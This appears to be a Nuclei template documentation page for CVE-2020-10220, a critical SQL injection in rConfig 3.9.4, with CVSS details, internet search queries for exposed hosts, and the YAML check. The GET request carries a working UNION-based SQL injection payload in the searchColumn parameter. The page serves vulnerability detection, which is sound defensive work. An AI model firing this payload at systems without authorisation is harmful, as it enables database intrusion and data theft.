Skip to content
Nuclei Templates

rConfig 3.9 - SQL Injection

ID: CVE-2020-10220

Severity: critical

Author: ritikchaddha,theamanrawat

Tags: cve,cve2020,packetstorm,rconfig,sqli

Description

Section titled “Description”

An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2020-10220


info:
  name: rConfig 3.9 - SQL Injection
  author: ritikchaddha,theamanrawat
  severity: critical
  description: |
    An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10220
    - http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
    - http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
    - https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10220
    cwe-id: CWE-89
    epss-score: 0.03051
    epss-percentile: 0.90974
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query:
      - title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve,cve2020,packetstorm,rconfig,sqli
variables:
  num: "999999999"


http:
  - method: GET
    path:
      - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502202a5aaacca4c93ec06ff107675f99d72b86ee6980834cc8b75e41edc26ef129c00221008f0782faa12fc82bfcca8ddf7c724afca177bcf0f97c61fbf0494a1048f89fa2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-10220.yaml"

View on Github